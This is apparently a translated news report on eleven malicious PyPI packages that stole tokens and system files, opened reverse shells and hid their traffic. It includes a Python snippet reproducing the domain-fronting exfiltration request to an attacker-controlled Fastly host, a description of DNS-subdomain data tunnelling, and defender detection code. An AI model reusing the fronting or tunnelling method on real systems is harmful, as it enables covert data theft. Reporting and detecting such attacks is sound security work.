Malicious libraries identified in the PyPI catalog that use the PyPI CDN to hide their communication channel.

In the PyPI (Python Package Index) repository, 11 packages containing malicious code have been identified. Before the problem was detected, the packages had been downloaded about 38 thousand times in total. The malicious packages found are notable for their use of sophisticated methods to hide the communication channels to the attackers' servers.

  • importantpackage (6305 downloads), important-package (12897) - established a connection to an external server under the guise of connecting to pypi.python.org in order to provide shell access to the system (reverse shell), and used the trevorc2 program to hide the communication channel.
  • pptest (10001), ipboards (946) - used DNS as a communication channel to transmit information about the system (the first package sent the host name, working directory, internal and external IP; the second sent the user name and host name).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) - located the Discord service token on the system and sent it to an external host.
  • trrfab (287) - sent the identifier, host name and contents of /etc/passwd, /etc/hosts and /home to an external host.
  • 10Cent10 (490) - established a reverse shell connection to an external host.
  • yandex-yt (4183) - displayed a message that the system was compromised and redirected to a page with additional information about further actions, served via nda.ya.ru (api.ya.cc).

Of particular interest is the method of reaching external hosts used in the importantpackage and important-package packages, which abuse the Fastly content delivery network that fronts the PyPI catalog to hide their activity. Requests were in fact sent to the pypi.python.org server (including the python.org name being specified in the SNI of the HTTPS request), but the HTTP "Host" header contained the name of a server controlled by the attackers (sec.forward.io.global.prod.fastly.net). The content delivery network then forwarded the same request to the attackers' server, reusing the parameters of the TLS connection to pypi.python.org when transmitting the data.

The PyPI infrastructure is served by the Fastly content delivery network, which uses the Varnish transparent proxy to cache typical requests and terminates TLS (certificate handling) at the CDN level rather than on the origin servers, so that HTTPS requests are passed through the proxy. Regardless of the target host, requests are sent to the proxy, which determines the required host from the HTTP "Host" header; the host domain names are bound to the CDN load balancer IP addresses that are shared by all Fastly customers.

The attackers' server is likewise registered with the Fastly CDN, which offers free plans to everyone and allows anonymous registration. Notably, the same scheme is used for sending requests to the victim when setting up the "reverse shell", but in that case it is initiated from the attacker's side. From the outside, the interaction with the attackers' server looks like a legitimate session with the PyPI catalog, encrypted with the PyPI TLS certificate. A similar technique, known as "domain fronting", was previously used to hide the host name when circumventing blocking: it relies on the ability, offered by some CDN networks, to reach a host over HTTPS by presenting a fictitious host in the SNI while actually passing the name of the requested host in the HTTP Host header inside the TLS session.


To conceal the malicious activity, the TrevorC2 package was used to make the communication with the server resemble ordinary web browsing; for example, the malicious requests were sent under the guise of loading the image "https://pypi.python.org/images/?guid=", with the information encoded in the guid parameter:

    from urllib import request
    # b64_payload: base64-encoded data collected earlier by the malware
    url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
    # SNI and TCP connection go to pypi.python.org; the Host header names the attacker-controlled Fastly service
    r = request.Request(url, headers={'Host': "psec.forward.io.global.prod.fastly.net"})

The pptest and ipboards packages used a different method of hiding their network activity, based on encoding the harvested information in queries to a DNS server. The malware transmits information by issuing DNS requests of the form "nu4timjagq4fimbuhe.example.com", where the data sent to the control server is base64-encoded into the subdomain name. The attacker receives these messages by controlling the DNS server for the example.com domain.
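As an added defender-side example (not code from the report or from the packages described), the following checks a constructed proxy log for the SNI/Host mismatch used by importantpackage and important-package, and a constructed DNS query log for long encoded subdomain labels like the one used by pptest and ipboards; the log record format and field names are assumptions.

```python
import re

# Constructed sample records (not from the report). PROXY_LOG models a
# TLS-terminating proxy that records the SNI and the inner HTTP Host header;
# DNS_LOG models queried names from a resolver log.
PROXY_LOG = [
    {"sni": "pypi.python.org", "host": "pypi.python.org"},
    {"sni": "pypi.python.org", "host": "www.python.org"},
    {"sni": "pypi.python.org", "host": "psec.forward.io.global.prod.fastly.net"},
]
DNS_LOG = [
    "pypi.org",
    "www.example.com",
    "nu4timjagq4fimbuhe.example.com",
]

# Leftmost label made only of base64-style characters and at least 16 long.
ENCODED_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]{16,}$")


def registrable(name):
    """Approximate the registrable domain by the last two labels.
    A public-suffix list would be more accurate for names like co.uk."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def fronting_suspects(records):
    """Return (sni, host) pairs where the Host header points at a different
    site than the TLS SNI. A normal PyPI client presents the same name in
    both; a Host naming another CDN customer is the domain-fronting pattern."""
    hits = []
    for rec in records:
        sni, host = rec["sni"], rec["host"]
        if registrable(sni) != registrable(host):
            hits.append((sni.lower(), host.lower()))
    return hits


def dns_tunnel_suspects(names):
    """Return queried names whose leftmost label looks like an encoded blob.
    Long random-looking labels also occur on legitimate CDN hostnames, so
    treat hits as leads to correlate with query volume and the queried zone."""
    hits = []
    for name in names:
        label = name.rstrip(".").split(".")[0]
        if ENCODED_LABEL.match(label):
            hits.append(name)
    return hits
```

Running both functions over the constructed logs flags only the fastly.net Host and the base64-looking subdomain; the www.python.org Host sharing the SNI's registrable domain is not reported.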

Source: opennet.ru
